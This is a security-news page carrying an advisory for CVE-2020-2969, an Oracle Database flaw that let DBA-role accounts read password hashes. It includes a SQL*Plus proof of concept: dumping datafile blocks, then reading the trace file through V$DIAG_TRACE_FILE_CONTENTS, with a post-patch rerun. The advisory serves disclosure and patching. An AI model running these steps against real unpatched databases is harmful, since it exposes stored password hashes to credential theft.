Security
Headlines
HeadlinesLatestCVEs

Headline

Oracle Database Password Hash Unauthorized Access

Oracle Database versions 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, and 19c allows for unauthorized access to password hashes by an account with the DBA role.

Packet Storm
#sql#vulnerability#ios#mac#linux#oracle#wordpress#auth

Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role
Product: Database
Manufacturer: Oracle
Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Risk Level: Medium
Solution Status: Fixed
CVE Reference: CVE-2020-2969
Base Score: 6.6
Author of Advisory: Emad Al-Mousa


Vulnerability Details:

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.

The presented scenarios illustrates that an account with “DBA” role can still view/extract the password hashes although the account can’t directly query SYS.USER$ table as a security enhancement since “select any dictionary” system privilege doesn’t provide access to SYS.USER$ anymore


Proof of Concept (PoC):

This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.

SQL> create user ninja identified by hello_123;

SQL> grant create session to ninja;

SQL> grant dba to ninja;

SQL> alter user ninja default role all;

*** when attempting to select from SYS.USER$ the account will not be able since the system privilege “SELECT ANY DICTIONARY” is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges

** I will perform dump to the system data file to gain access to the hashed passwords

SQL> alter system dump datafile 1 block min 210 block max 215;

** Then immediately I will check the generated trace file name using the query:

SQL> select * from v$diag_info where NAME=’Default Trace File’;

** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME=’ORCLCDB_ora_6029.trc’;

// the password hash will be exposed in the trace file !

After applying Oracle July 2020 CPU patches- try to re-simulate again:

SQL> create user ninja identified by hello_123;

SQL> grant create session to ninja;

SQL> grant dba to ninja;

SQL> alter user ninja default role all;

SQL> show user
USER is “NINJA”

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> alter system dump datafile 1 block min 210 block max 215;
alter system dump datafile 1 block min 210 block max 215

ERROR at line 1:
ORA-01031: insufficient privileges

SQL> select * from v$diag_info where NAME=’Default Trace File’;

INST_ID NAME  

VALUE

CON_ID  

     1 Default Trace File  

/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME=’ora5_ora_117116.trc’;

PAYLOAD

Trace file
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc

Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.8.0.0.0
Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702
ORACLE_HOME: /oraclex/oradbp05/product/19.3
System name: Linux
Node name: boba
Release: 3.10.0-1127.13.1.el7.x86_64
Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020

PAYLOAD

Machine: x86_64
Instance name: ora5
Redo thread mounted by this instance: 1
Oracle process number: 69
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)

*** 2020-07-16T11:09:31.240875+03:00

*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00

PAYLOAD

*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00
*** MODULE NAME:(SQLPlus) 2020-07-16T11:09:31.240938+03:00
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00
*** CLIENT DRIVER:(SQL
PLUS) 2020-07-16T11:09:31.240948+03:00

Error: file 1 can only be dumped with SYSDBA privillege


References:
https://www.oracle.com/security-alerts/cpujul2020.html
https://www.oracle.com/security-alerts/cpujul2020verbose.html
https://nvd.nist.gov/vuln/detail/CVE-2020-2969
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/

Related news

CVE-2020-2978: Oracle Critical Patch Update Advisory - July 2020

Vulnerability in the Oracle Database - Enterprise Edition component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Oracle Database - Enterprise Edition. While the vulnerability is in Oracle Database - Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database - Enterprise Edition accessible data. CVSS 3.1 Base Score 4.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N).

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution